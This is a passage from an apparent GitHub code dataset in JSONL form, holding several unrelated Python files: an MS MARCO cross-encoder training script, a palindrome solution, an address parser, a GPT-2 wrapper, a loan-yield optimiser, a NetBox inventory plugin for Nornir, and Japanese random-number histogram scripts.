1 positive sample (label 1) we include 4 negative samples (label 0)\n# in our training setup. For the negative samples, we use the triplets provided by MS Marco that\n# specify (query, positive sample, negative sample).\npos_neg_ration = 4\n\n# Maximal number of training samples we want to use\nmax_train_samples = 2e7\n\n#We set num_labels=1, which predicts a continous score between 0 and 1\nmodel = CrossEncoder(model_name, num_labels=1, max_length=512)\n\n\n### Now we read the MS Marco dataset\ndata_folder = 'msmarco-data'\nos.makedirs(data_folder, exist_ok=True)\n\n\n#### Read the corpus files, that contain all the passages. Store them in the corpus dict\ncorpus = {}\ncollection_filepath = os.path.join(data_folder, 'collection.tsv')\nif not os.path.exists(collection_filepath):\n tar_filepath = os.path.join(data_folder, 'collection.tar.gz')\n if not os.path.exists(tar_filepath):\n logging.info(\"Download collection.tar.gz\")\n util.http_get('https://msmarco.blob.core.windows.net/msmarcoranking/collection.tar.gz', tar_filepath)\n\n with tarfile.open(tar_filepath, \"r:gz\") as tar:\n tar.extractall(path=data_folder)\n\nwith open(collection_filepath, 'r', encoding='utf8') as fIn:\n for line in fIn:\n pid, passage = line.strip().split(\"\\t\")\n corpus[pid] = passage\n\n\n### Read the train queries, store in queries dict\nqueries = {}\nqueries_filepath = os.path.join(data_folder, 'queries.train.tsv')\nif not os.path.exists(queries_filepath):\n tar_filepath = os.path.join(data_folder, 'queries.tar.gz')\n if not os.path.exists(tar_filepath):\n logging.info(\"Download queries.tar.gz\")\n util.http_get('https://msmarco.blob.core.windows.net/msmarcoranking/queries.tar.gz', tar_filepath)\n\n with tarfile.open(tar_filepath, \"r:gz\") as tar:\n tar.extractall(path=data_folder)\n\n\nwith open(queries_filepath, 'r', encoding='utf8') as fIn:\n for line in fIn:\n qid, query = line.strip().split(\"\\t\")\n queries[qid] = query\n\n\n\n### Now we create our training & dev data\ntrain_samples = []\ndev_samples = {}\n\n# We use 200 random queries from the train set for evaluation during training\n# Each query has at least one relevant and up to 200 irrelevant (negative) passages\nnum_dev_queries = 200\nnum_max_dev_negatives = 200\n\n# msmarco-qidpidtriples.rnd-shuf.train-eval.tsv.gz and msmarco-qidpidtriples.rnd-shuf.train.tsv.gz is a randomly\n# shuffled version of qidpidtriples.train.full.2.tsv.gz from the MS Marco website\n# We extracted in the train-eval split 500 random queries that can be used for evaluation during training\ntrain_eval_filepath = os.path.join(data_folder, 'msmarco-qidpidtriples.rnd-shuf.train-eval.tsv.gz')\nif not os.path.exists(train_eval_filepath):\n logging.info(\"Download \"+os.path.basename(train_eval_filepath))\n util.http_get('https://sbert.net/datasets/msmarco-qidpidtriples.rnd-shuf.train-eval.tsv.gz', train_eval_filepath)\n\nwith gzip.open(train_eval_filepath, 'rt') as fIn:\n for line in fIn:\n qid, pos_id, neg_id = line.strip().split()\n\n if qid not in dev_samples and len(dev_samples) < num_dev_queries:\n dev_samples[qid] = {'query': queries[qid], 'positive': set(), 'negative': set()}\n\n if qid in dev_samples:\n dev_samples[qid]['positive'].add(corpus[pos_id])\n\n if len(dev_samples[qid]['negative']) < num_max_dev_negatives:\n dev_samples[qid]['negative'].add(corpus[neg_id])\n\n\n# Read our training file\ntrain_filepath = os.path.join(data_folder, 'msmarco-qidpidtriples.rnd-shuf.train.tsv.gz')\nif not os.path.exists(train_filepath):\n logging.info(\"Download \"+os.path.basename(train_filepath))\n util.http_get('https://sbert.net/datasets/msmarco-qidpidtriples.rnd-shuf.train.tsv.gz', train_filepath)\n\ncnt = 0\nwith gzip.open(train_filepath, 'rt') as fIn:\n for line in tqdm.tqdm(fIn, unit_scale=True):\n qid, pos_id, neg_id = line.strip().split()\n\n if qid in dev_samples:\n continue\n\n query = queries[qid]\n if (cnt % (pos_neg_ration+1)) == 0:\n passage = corpus[pos_id]\n label = 1\n else:\n passage = corpus[neg_id]\n label = 0\n\n train_samples.append(InputExample(texts=[query, passage], label=label))\n cnt += 1\n\n if cnt >= max_train_samples:\n break\n\n# We create a DataLoader to load our train samples\ntrain_dataloader = DataLoader(train_samples, shuffle=True, batch_size=train_batch_size)\n\n# We add an evaluator, which evaluates the performance during training\n# It performs a classification task and measures scores like F1 (finding relevant passages) and Average Precision\nevaluator = CERerankingEvaluator(dev_samples, name='train-eval')\n\n# Configure the training\nwarmup_steps = 5000\nlogging.info(\"Warmup-steps: {}\".format(warmup_steps))\n\n\n# Train the model\nmodel.fit(train_dataloader=train_dataloader,\n evaluator=evaluator,\n epochs=num_epochs,\n evaluation_steps=10000,\n warmup_steps=warmup_steps,\n output_path=model_save_path,\n use_amp=True)\n\n#Save latest model\nmodel.save(model_save_path+'-latest')","repo_name":"UKPLab/sentence-transformers","sub_path":"examples/training/ms_marco/train_cross-encoder_scratch.py","file_name":"train_cross-encoder_scratch.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","stars":12439,"dataset":"github-code","pt":"48"} +{"seq_id":"38121960180","text":"def longestPalindrome(s: str) -> str:\n res = \"\"\n resLen = 0\n\n for i in range(len(s)):\n # odd length\n l, r = i, i\n while l >= 0 and r < len(s) and s[l] == s[r]:\n if (r - l + 1) > resLen:\n res = s[l: r + 1]\n resLen = r - l + 1\n l -= 1\n r += 1\n\n # even length\n l, r = i, i + 1\n while l >= 0 and r < len(s) and s[l] == s[r]:\n if (r - l + 1) > resLen:\n res = s[l: r + 1]\n resLen = r - l + 1\n l -= 1\n r += 1\n\n return res\n\n\ndef test():\n test_cases = [\n {\n \"name\": \"simple case 1\",\n \"input\": \"babad\",\n \"expected\": \"bab\"\n },\n {\n \"name\": \"simple case 2\",\n \"input\": \"cbbd\",\n \"expected\": \"bb\"\n }\n ]\n\n for test_case in test_cases:\n assert test_case[\"expected\"] == longestPalindrome(test_case[\"input\"]), test_case[\"name\"]\n\nif __name__ == \"__main__\":\n from datetime import datetime\n start_time = datetime.now()\n test()\n print(\"Everything passed\")\n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))","repo_name":"0xspringtime/leetcode","sub_path":"0005.py","file_name":"0005.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27820629449","text":"import pandas as pd\nimport json\n\n\n# This program takes an address as an input from the user through the terminal. \n# Then, it splits and returns the address as street and house number. \n# Lastly, it save all the information in a CSV file named 'Addresses.csv'\n\n\n\"\"\"\n This are some examples of inputs and outputs from the program\n\n \"Winterallee 3\" -> {\"street\": \"Winterallee\", \"housenumber\": \"3\"}\n \"Musterstrasse 45\" -> {\"street\": \"Musterstrasse\", \"housenumber\": \"45\"}\n \"Blaufeldweg 123B\" -> {\"street\": \"Blaufeldweg\", \"housenumber\": \"123B\"}\n \"Am Bächle 23\" -> {\"street\": \"Am Bächle\", \"housenumber\": \"23\"}\n \"Auf der Vogelwiese 23 b\" -> {\"street\": \"Auf der Vogelwiese\", \"housenumber\": \"23 b\"}\n \"4, rue de la revolution\" -> {\"street\": \"rue de la revolution\", \"housenumber\": \"4\"}\n \"200 Broadway Av\" -> {\"street\": \"Broadway Av\", \"housenumber\": \"200\"}\n \"Calle Aduana, 29\" -> {\"street\": \"Calle Aduana\", \"housenumber\": \"29\"}\n \"Calle 39 No 1540\" -> {\"street\": \"Calle 39\", \"housenumber\": \"No 1540\"}\n\"\"\"\n\n\n# Initialize a dictionaty to generate or append later to the CSV file\ndicctionaryToDB = {\n \"address\": list(),\n \"street\": list(),\n \"housenumber\": list()\n}\n\n\ndef save_address(address, street, housenumber):\n \"\"\"\n Take address data and append it to the initialized dictionary\n \"\"\"\n dicctionaryToDB[\"address\"].append(address)\n dicctionaryToDB[\"street\"].append(street)\n dicctionaryToDB[\"housenumber\"].append(housenumber)\n\n\ndef generate_csv():\n \"\"\"\n Try to open \"Addresses.csv\" and appendes to it the information from the inserted address.\n If it cannot open it, it will create it and append the information from the inserted address.\n \"\"\"\n try:\n df = pd.read_csv(\"Addresses.csv\", index_col=\"Unnamed: 0\", sep=';')\n updatedDf = pd.concat([df, pd.DataFrame(dicctionaryToDB)], ignore_index=True, join=\"outer\")\n updatedDf.to_csv('Addresses.csv', sep=';')\n\n except:\n df = pd.DataFrame(dicctionaryToDB)\n df.to_csv('Addresses.csv', sep=';')\n\n\ndef address_house_separator(address):\n \"\"\"\n Takes as an input an address and make all the pertinent transformations to divide the \n input into street and house number. Then, it retrieves this information in the form of a JSON.\n\n It also save all that information into the python dictionary 'dicctionaryToDB'\n \"\"\"\n fil = [x.isnumeric() for x in address.split()]\n\n if ',' in address:\n lis = [x.strip() for x in address.split(',')]\n housenumber = min(lis, key=len)\n street = max(lis, key=len)\n\n elif len([i for (i, v) in zip(address.split(), fil) if v]) > 1:\n for x in range(1, len(address)):\n if address[x-1].isnumeric() == True and address[x].isnumeric() == False:\n lis = [address[:x].strip(), address[x:].strip()]\n street = max(lis, key=len)\n housenumber = min(lis, key=len)\n break\n\n else:\n if address[0].isdigit():\n housenumber = address.split()[0].strip()\n street = ' '.join(address.split()[1:]).strip()\n\n else:\n for x in range(len(address)):\n if address[x].isnumeric():\n street = address[:x].strip()\n housenumber = address[x:].strip()\n break\n \n save_address(address, street, housenumber)\n generate_csv()\n return print(json.dumps({\"street\":street, \"housenumber\":housenumber}))\n\n\n# Try to open \"Addresses.csv\" and appendes to it the information from the inserted address.\n# If it cannot open it, it will create it and append the information from the inserted address.\ntry:\n df = pd.read_csv(\"Addresses.csv\", index_col=\"Unnamed: 0\", sep=';')\n updatedDf = pd.concat([df, pd.DataFrame(dicctionaryToDB)], ignore_index=True, join=\"outer\")\n updatedDf.to_csv('Addresses.csv', sep=';')\n\nexcept:\n df = pd.DataFrame(dicctionaryToDB)\n df.to_csv('Addresses.csv', sep=';')\n \n \n \nif __name__ == \"__main__\":\n address_house_separator()\n","repo_name":"david94zgz/Addresses-separator","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33899937995","text":"\"\"\"This is SWAMP: Solving structures With Alpha Membrane Pairs\n\nThis module implements classes and methods to be used as a logging interface by SWAMP.\n\"\"\"\n\n__author__ = \"Filomeno Sanchez Rodriguez\"\n__credits__ = \"Daniel Rigden, & Ronan Keegan\"\n__email__ = \"filomeno.sanchez-rodriguez@liv.ac.uk\"\n\nfrom swamp import version\nimport os\n\n__version__ = version.__version__\n\nif 'DISABLE_DEPENDENCY_CHECKS' not in os.environ and \"CCP4\" not in os.environ:\n raise RuntimeError(\"Cannot find CCP4 root directory\")\n\n_PACKAGE_PATH = os.path.join(os.environ[\"CCP4\"], \"lib\", \"py2\", \"swamp\")\nIDEALHELICES_DIR = os.path.join(_PACKAGE_PATH, \"idealhelices\")\n\n\ndef SwampLogger(*args, **kwargs):\n \"\"\":py:obj:`~swamp.logger.swamplogger.SwampLogger` instance\"\"\"\n from swamp.logger.swamplogger import SwampLogger\n\n return SwampLogger(*args, **kwargs)\n","repo_name":"rigdenlab/SWAMP","sub_path":"swamp/logger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15024243047","text":"\"\"\"Wrapper for a GPT-2 model.\"\"\"\n\n\n\nimport torch\nimport transformers\n\nfrom .transformers_model import TransformersModel\nfrom .utils import punctuated_join\n\n\nclass GPT2Model(TransformersModel):\n def __init__(self, config):\n super().__init__(\n config,\n tokenizer_cls=transformers.GPT2Tokenizer,\n model_cls=transformers.GPT2LMHeadModel,\n use_prefix_space=True,\n add_padding_token=True,\n bidirectional=False\n )\n\n # From: https://github.com/huggingface/transformers/issues/3021\n @torch.no_grad()\n def predict(self, left_contexts, right_contexts):\n inputs = [punctuated_join(left_context) for left_context in left_contexts]\n inputs_dict = self.tokenizer.batch_encode_plus(inputs, padding=True, add_prefix_space=False, return_tensors=\"pt\")\n inputs = inputs_dict[\"input_ids\"].to(self.device)\n attn_mask = inputs_dict[\"attention_mask\"].to(self.device)\n\n last_non_masked_idx = torch.sum(attn_mask, dim=1) - 1\n # get position ids\n position_ids = torch.tensor([list(range(inputs.shape[1])) for i in range(inputs.shape[0])]).to(self.device)\n for i, position_ids_slice in enumerate(position_ids):\n position_ids_slice[last_non_masked_idx[i]:] = position_ids_slice[last_non_masked_idx[i]]\n\n logits = self.model(inputs, attention_mask=attn_mask, position_ids=position_ids)[0]\n result = logits[torch.arange(len(left_contexts), device=self.device), last_non_masked_idx].cpu()\n return result\n","repo_name":"bnewm0609/refining-tse","sub_path":"src/models/gpt2_model.py","file_name":"gpt2_model.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12284547834","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport utils\n\nfrom facility import Facility\nfrom loan_request import LoanRequest\n\n\nclass LoanFacilitiesServer(object):\n \"\"\"\n LoanFacilitiesServer class with loan stream processing capability.\n\n NOTE: This class abstracts the input _format_ specific parsing. Input format is likely\n to change with time. Ideally, there should be dedicated classes for each input source\n isolating format specific parsing functionality.\n\n Idempotent Interfaces:\n LoanFacilitiesServer(): Constructor that loads & parses facilities, covenants and loans csv\n parse_facilities_and_covenants(): Parses facilities and covenants into a unified list\n parse_loan_request(): Parses loan requests into a convenient `LoanRequest` object\n\n Non-Idempotent Interfaces:\n process_loans_stream(): Processes loans for optimal yield facility assignment\n log_loan_assignment(): Logs loan assignment\n generate_facility_yield_report(): Generates facility yield report\n \"\"\"\n\n def __init__(self, facilities_csv_path, covenants_csv_path, loans_csv_path):\n \"\"\"\n Construtor for `LoanFacilitiesServer`.\n\n Performs the following steps:\n 1. Loads facilities, covenants and loans csv into dataframes.\n 2. Parses facilities and covenants into a unified list of `Facility` objects.\n 3. Sorts `facilities_list` by `interest_rate` to optimize yield\n\n Arguments:\n facilities_csv_path (string)\n covenants_csv_path (string)\n loans_csv_path (string)\n\n Returns:\n `LoanFacilitiesServer` object\n\n Raises:\n OSError: if any of the input files are not accessible\n \"\"\"\n\n # Load Facilities with its associated Covenats\n self.facilities_df = pd.read_csv(facilities_csv_path)\n self.covenants_df = pd.read_csv(covenants_csv_path)\n\n # Parse Facilities & Covenants\n self.facilities_list = self.parse_facilities_and_covenants()\n # Sort facility by `interest_rate` to optimize yield\n self.facilities_list.sort(key=lambda facility: facility.interest_rate)\n\n # Load Loans csvfile\n # NOTE: This will be processed a stream input\n self.loans_df = pd.read_csv(loans_csv_path)\n\n def parse_facilities_and_covenants(self, facilities_df=None, covenants_df=None):\n \"\"\"\n Parses facilities and covenants into a unified list of `Facility` objects\n\n Arguments:\n facilities_df (dataframe) or None\n covenants_df (dataframe) or None\n\n Returns:\n facilities_list (list of Facility objects)\n\n Raises:\n AttributeError: if facilities_df or covenants_df are not valid dataframes\n TypeError: if facilities_df or covenants_df have invalid values\n\n Known Limitations:\n Input format specific parser.\n \"\"\"\n # TODO(Future): Move this function to an input source specific class\n\n if facilities_df is None:\n facilities_df = self.facilities_df\n if covenants_df is None:\n covenants_df = self.covenants_df\n\n facilities_list = []\n for facility_metadata in facilities_df.itertuples():\n facility_covenants_df = covenants_df[covenants_df.facility_id == facility_metadata.id]\n\n max_default_likelihood = float(facility_covenants_df.max_default_likelihood.dropna())\n facility_id = int(facility_metadata.id)\n bank_id = int(facility_metadata.bank_id)\n amount = float(facility_metadata.amount)\n interest_rate = float(facility_metadata.interest_rate)\n banned_states = facility_covenants_df.banned_state.tolist()\n\n facilities_list.append(Facility(facility_id,\n bank_id,\n amount,\n interest_rate,\n max_default_likelihood,\n banned_states))\n return facilities_list\n\n def parse_loan_request(self, loan):\n \"\"\"\n Parses a single loan request stream input entry into a convenient `LoanRequest` object.\n\n Arguments:\n loan (dataframe row)\n\n Returns:\n loan_request (LoanRequest object)\n\n Raises:\n AttributeError: if `loan` is not a valid dataframe row\n TypeError: if `loan` has an invalid value\n\n Known Limitations:\n Input format specific parser.\n \"\"\"\n # TODO(Future): Move this function to an input source specific class\n\n loan_id = int(loan.id)\n amount = float(loan.amount)\n default_likelihood = float(loan.default_likelihood)\n interest_rate = float(loan.interest_rate)\n origin_state = str(loan.state)\n\n loan_request = LoanRequest(loan_id,\n amount,\n default_likelihood,\n interest_rate,\n origin_state)\n return loan_request\n\n def process_loans_stream(self, assignment_csv_path):\n \"\"\"\n Processes a loan stream to find an optimal yield given a list of facilities\n while satisfying their covenants and constraints.\n\n For every loan in the stream, perform the following steps:\n 1. Parse a single loan request\n 2. Find an optimal valid loan assignment given `facilities_list`\n 3. Issue Loan via a facility\n 4. Log loan assignmnet\n\n NOTE: This is not an idempotent fuction as it issues side effects\n\n Arguments:\n assignment_csv_path (string)\n\n Returns:\n None\n\n Raises:\n OSError: if assignment_csv_path is not accessible\n AttributeError: if `loan` is not a valid dataframe row\n TypeError: if `loan` has an invalid value\n\n Side Effects:\n Writing to a file\n \"\"\"\n # NOTE: On a large-scale high-performance production system this should be implemented\n # as a distributed system workers performing various streaming and batch reporting tasks\n\n for loan in self.loans_df.itertuples():\n # Parse a _single_ Loan Request\n loan_request = self.parse_loan_request(loan)\n # Iterate over facilities for loan assignments\n for facility in self.facilities_list:\n if facility.is_valid_assignment(loan_request):\n # Issue Loan and compute corresponding expected yield\n # NOTE: Return value `expected_yield` of `issue_loan` is unused here but could be used\n # to feed into a real-time monitoring dashboard. Imagine a graph of:\n # (a) Overall Yield vs. Time, or\n # (b) Yield Per Facility vs. Time\n facility.issue_loan(loan_request)\n\n # Log Loan Assignment\n self.log_loan_assignment(assignment_csv_path, loan_request.loan_id, facility.facility_id)\n\n # Loan request satisfied\n break\n\n @classmethod\n def log_loan_assignment(self, csv_filepath, loan_id, facility_id):\n \"\"\"\n Consumes a generic stream writer to log a loan assignment\n\n NOTE: This is not an idempotent fuction as it issues side effects\n\n Arguments:\n csv_filepath (string)\n loan_id (integer)\n facility_id (integer)\n\n Returns:\n None\n\n Raises:\n OSError: if csv_filepath is not accessible\n\n Side Effects:\n Writing to a file\n \"\"\"\n header = ['loan_id', 'facility_id']\n row_values = [loan_id, facility_id]\n utils.stream_writer(csv_filepath, header, row_values)\n\n def generate_facility_yield_report(self, csv_filepath, facilities_list=None):\n \"\"\"\n Generates an overall yield report of all facilities\n\n NOTE: This is not an idempotent fuction as it issues side effects\n\n Arguments:\n csv_filepath (string)\n facilities_list (list of `Facility` objects)\n\n Returns:\n None\n\n Raises:\n OSError: if csv_filepath is not accessible\n AttributeError: if `facilities_list` is not a valid list of `Facility` objects\n TypeError: if `facilities_list` has an invalid value\n\n Side Effects:\n Writing to a file\n \"\"\"\n if facilities_list is None:\n facilities_list = self.facilities_list\n\n drop_columns = ['balance_amount', 'bank_id', 'banned_states', 'initial_amount',\n 'interest_rate', 'max_default_likelihood', 'current_yield']\n yield_report = pd.DataFrame(vars(f) for f in facilities_list)\n yield_report['expected_yield'] = yield_report.current_yield.apply(lambda amount: round(amount))\n yield_report = yield_report.drop(drop_columns, axis=1)\n yield_report.to_csv(path_or_buf=csv_filepath, index=False)\n","repo_name":"manavkataria/work_samples","sub_path":"bank_loan_yield_optimization/loan_facilities_server.py","file_name":"loan_facilities_server.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5015842409","text":"import os\nimport math\nfrom pprint import pprint\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom nornir.core.deserializer.inventory import Inventory, HostsDict\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\nimport requests\n\n\nclass NBExInventory(Inventory):\n def __init__(\n self,\n nb_url: Optional[str] = None,\n nb_token: Optional[str] = None,\n use_slugs: bool = True,\n ssl_verify: Union[bool, str] = True,\n flatten_custom_fields: bool = True,\n filter_parameters: Optional[Dict[str, Any]] = None,\n **kwargs: Any,\n ) -> None:\n \"\"\"\n\n Netbox Extended Plugin\n\n nb_url: Netbox url, defaults to http://localhost:8080.\n You can also use env variable NB_URL\n nb_token: Netbox token. You can also use env variable NB_TOKEN\n use_slugs: Whether to use slugs or not\n ssl_verify: Enable/disable certificate validation or provide path to CA bundle file\n flatten_custom_fields: Whether to assign custom fields directly to the host or not\n filter_parameters: Key-value pairs to filter down host\n\n \"\"\"\n filter_parameters = filter_parameters or {}\n nb_url = nb_url or os.environ.get(\"NB_URL\", \"http://localhost:8080\")\n nb_token = nb_token or os.environ.get(\n \"NB_TOKEN\", \"jkdbfgjklsbdfugbsodiufbgsldfjbsdf\"\n )\n\n nb_devices = self._fetch_data(\n nb_url=nb_url,\n ssl_verify=ssl_verify,\n nb_token=nb_token,\n filter_parameters=filter_parameters,\n get_devices=True,\n )\n hosts = {}\n for d in nb_devices:\n host: HostsDict = {\"data\": {}}\n\n # Add the value for IP address\n if d.get(\"primary_ip\", {}):\n host[\"hostname\"] = d[\"primary_ip\"][\"address\"].split(\"/\")[0]\n\n # Add the values that dont have an option for 'slug'\n host[\"data\"][\"serial\"] = d[\"serial\"]\n host[\"data\"][\"vendor\"] = d[\"device_type\"][\"manufacturer\"][\"name\"]\n host[\"data\"][\"asset_tag\"] = d[\"asset_tag\"]\n\n if flatten_custom_fields:\n for cf, value in d[\"custom_fields\"].items():\n host[\"data\"][cf] = value\n else:\n host[\"data\"][\"custom_fields\"] = d[\"custom_fields\"]\n\n # Add values that have an option for 'slug'\n if use_slugs:\n host[\"data\"][\"site\"] = d[\"site\"][\"slug\"]\n host[\"data\"][\"role\"] = d[\"device_role\"][\"slug\"]\n host[\"data\"][\"model\"] = d[\"device_type\"][\"slug\"]\n\n # Attempt to add 'platform' based of value in slug\n host[\"platform\"] = d[\"platform\"][\"slug\"] if d[\"platform\"] else None\n else:\n host[\"data\"][\"site\"] = d[\"site\"][\"name\"]\n host[\"data\"][\"role\"] = d[\"device_role\"]\n host[\"platform\"] = d[\"platform\"]\n\n # Get the IP addresses assigned to the interfaces of the host\n host[\"data\"][\"interfaces\"] = self._get_host_interfaces(\n nb_url=nb_url, ssl_verify=ssl_verify, nb_token=nb_token, host_id=d[\"id\"]\n )\n\n # Get Site ASN and custom fields for the host.\n site_results = self._fetch_data(\n nb_url=nb_url,\n ssl_verify=ssl_verify,\n nb_token=nb_token,\n get_site_data=True,\n )\n\n for site_result in site_results:\n if site_result[\"id\"] == d[\"site\"][\"id\"]:\n host[\"data\"][\"asn\"] = site_result[\"asn\"]\n\n if flatten_custom_fields:\n for site_cf, value in site_result[\"custom_fields\"].items():\n host[\"data\"][site_cf] = value\n else:\n host[\"data\"][\"custom_fields\"] = site_result[\"custom_fields\"]\n\n # Assign temporary dict to outer Dict\n # Netbos allows devices to be unnamed, but the Nornir model doesn't.\n # If a device is unnamed, set the name to the id of the device in netbox\n hosts[d.get(\"name\") or d.get(\"id\")] = host\n\n super().__init__(hosts=hosts, groups={}, defaults={}, **kwargs)\n\n def _fetch_data(\n self,\n nb_url=None,\n ssl_verify=True,\n nb_token=None,\n host_id=None,\n interface_id=None,\n site_id=None,\n filter_parameters=None,\n get_devices=False,\n get_interfaces=False,\n get_interfaces_ip=False,\n get_site_data=False,\n ):\n \"\"\"\n Fetch data from Netbox API based on flags:\n\n get_devices=False - Fetch all devices from Netbox\n get_interfaces=False - Fetch all interfaces data for a specific host\n get_interfaces_ip = False - Fetch all IP addresses for a specific interface on specific host\n get_site_data = False - Fetch all the site data and custom fields for the host's site\n\n get_devices, get_interfaces, get_site_data and get_interfaces_ip are mutually exclusive\n\n \"\"\"\n results: List[Dict[str, Any]] = []\n if get_devices:\n url = f\"{nb_url}/api/dcim/devices/?limit=0\"\n get_interfaces = False\n get_interfaces_ip = False\n get_site_data = False\n\n if get_interfaces_ip:\n url = f\"{nb_url}/api/ipam/ip-addresses?device_id={host_id}&interface_id={interface_id}\"\n get_interfaces = False\n get_devices = False\n get_site_data = False\n\n if get_interfaces:\n url = f\"{nb_url}/api/dcim/interfaces?device_id={host_id}\"\n get_devices = False\n get_interfaces_ip = False\n get_site_data = False\n\n if get_site_data:\n url = f\"{nb_url}/api/dcim/sites/\"\n get_devices = False\n get_interfaces_ip = False\n get_interfaces = False\n\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n session = requests.Session()\n session.headers.update({\"Authorization\": f\"Token {nb_token}\"})\n session.verify = ssl_verify\n\n # Fetch all deviced from Netbox\n # Netbox's API uses Pagination, Fetch until no nex\n\n while url:\n if get_devices:\n r = session.get(url, params=filter_parameters)\n else:\n r = session.get(url)\n\n if not r.status_code == 200:\n raise ValueError(\n f\"Failed to get the IP addresses from Netbox instance {nb_url}\"\n )\n\n resp = r.json()\n results.extend(resp.get(\"results\"))\n\n url = resp.get(\"next\")\n return results\n\n def _get_host_interfaces(self, nb_url, ssl_verify, nb_token, host_id):\n\n interfaces_list = []\n interfaces = {}\n ip_interface_list = []\n lag_members = []\n lags_list = []\n lags = {}\n\n interfaces_results = self._fetch_data(\n nb_url=nb_url,\n ssl_verify=ssl_verify,\n nb_token=nb_token,\n host_id=host_id,\n get_interfaces=True,\n )\n\n for interface_dict in interfaces_results:\n interfaces_list.append(interface_dict[\"name\"])\n\n for interface in interfaces_list:\n for interface_dict in interfaces_results:\n if interface == interface_dict[\"name\"]:\n interfaces[interface] = {}\n interfaces[interface][\"IPv4\"] = []\n interfaces[interface][\"IPv6\"] = []\n interfaces[interface][\"id\"] = interface_dict[\"id\"]\n # Check if interface is member of a LAG\n if interface_dict[\"lag\"] != None:\n interfaces[interface][\"lag\"] = {}\n interfaces[interface][\"lag\"][\"name\"] = interface_dict[\"lag\"][\n \"name\"\n ]\n interfaces[interface][\"lag\"][\"id\"] = interface_dict[\"lag\"][\"id\"]\n lag_info = interface, interface_dict[\"lag\"][\"name\"]\n lag_members.append(lag_info)\n\n interfaces[interface][\"mtu\"] = interface_dict[\"mtu\"]\n interfaces[interface][\"enabled\"] = interface_dict[\"enabled\"]\n interfaces[interface][\"description\"] = interface_dict[\"description\"]\n\n # Get the Ip addresses for interfaces that have IP addresses defined\n\n if interface_dict[\"count_ipaddresses\"] >= 1:\n ip_results = self._fetch_data(\n nb_url=nb_url,\n ssl_verify=ssl_verify,\n nb_token=nb_token,\n host_id=host_id,\n interface_id=interface_dict[\"id\"],\n get_interfaces_ip=True,\n )\n\n for intf_ip_dict in ip_results:\n interface_ip_tuple = (\n intf_ip_dict[\"address\"],\n intf_ip_dict[\"family\"][\"label\"],\n interface,\n )\n ip_interface_list.append(interface_ip_tuple)\n\n for element in ip_interface_list:\n if interface in element:\n if \"IPv4\" in element:\n interfaces[interface][\"IPv4\"].append(element[0])\n else:\n interfaces[interface][\"IPv6\"].append(element[0])\n\n # Get the min-links for the LAG interfaces\n\n # Create a list of LAGs from the tuple list\n for lag_tuple in lag_members:\n if lag_tuple[1] not in lags_list:\n lags_list.append(lag_tuple[1])\n\n # Create a dict of lag, List[str] of members pair\n for lag in lags_list:\n lags[lag] = []\n for element in lag_members:\n if lag in element:\n lags[lag].append(element[0])\n\n # Calculate min-links from the lags dict.\n for lag in lags.keys():\n num_members = len(lags[lag])\n min_links = math.ceil(0.5 * num_members)\n interfaces[lag][\"min_links\"] = min_links\n\n return interfaces\n","repo_name":"mss7082/nornir_st2","sub_path":"Nornir/workflows/helpers/netboxplus.py","file_name":"netboxplus.py","file_ext":"py","file_size_in_byte":10398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34740748540","text":"def sortByScore(records):\n records.sort(key = lambda x: x[1])\n return records\n\ndef sortByName(records):\n records.sort(key = lambda x: x[0])\n return records\n\nif __name__ == '__main__':\n records = []\n score = 0\n output = \"\"\n \n for _ in range(int(input())):\n name = input()\n score = float(input())\n \n records.append([name, score])\n \n sortByScore(records)\n \n lowestScore = records[0][1]\n \n for x in range(len(records)):\n if (records[x][1] != lowestScore):\n score = records[x][1]\n break\n \n sortByName(records) \n \n for x in range(len(records)):\n if (score == records[x][1]):\n output += records[x][0] + \"\\n\"\n \n print(output.strip())\n","repo_name":"MGreco2112/Python-Demos","sub_path":"algorithms/Python Nested List.py","file_name":"Python Nested List.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1103215827","text":"#ヒストグラムを作成するPythonコード(gazou4-1.py)\n\n# coding: utf-8\n# 一様乱数、算術計算、グラフ描画に必要なライブラリのインポート\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n# 乱数を足し合わせる回数\nN = 1200\n# 生成する乱数の個数を指定\nn = 10000\nf = []\ns = 0\n \n# 平均値0にするために、平均値N/2を差し引くことに留意する。\nfor i in range(N):\n s += np.random.rand(n)\nf.append(s - N/2)\n \n# 平均値と標準偏差の表示\nprint(\"Average : \" + str(np.average(f)))\nprint(\"std-div : \" + str(np.std(f)))\n \n# スタージェスの公式より階級幅pを14、または平方根の100とする。\np = 100\nplt.hist(f, bins=p)\nplt.ylabel(\"Frequency\")\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#乱数の個数nを変化させ標準偏差と平均値の変化を散布図としてプロットするPythonコード(gazou4-2.py)\n\n# coding: utf-8\n# 一様乱数、算術計算、グラフ描画に必要なライブラリのインポート\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n# 初期化など\nave_list = []\nstd_list = []\n# 0からnまでの乱数の個数を生成する。このnを変えると乱数の個数の最大値が変わる。\nn = 1000\n \n \ndef returner(n):\n # 乱数を足し合わせる回数\n N = 1200\n f = []\n s = 0\n for i in range(N):\n s = s + np.random.rand(n)\n f.append(s - N / 2)\n return np.average(f), 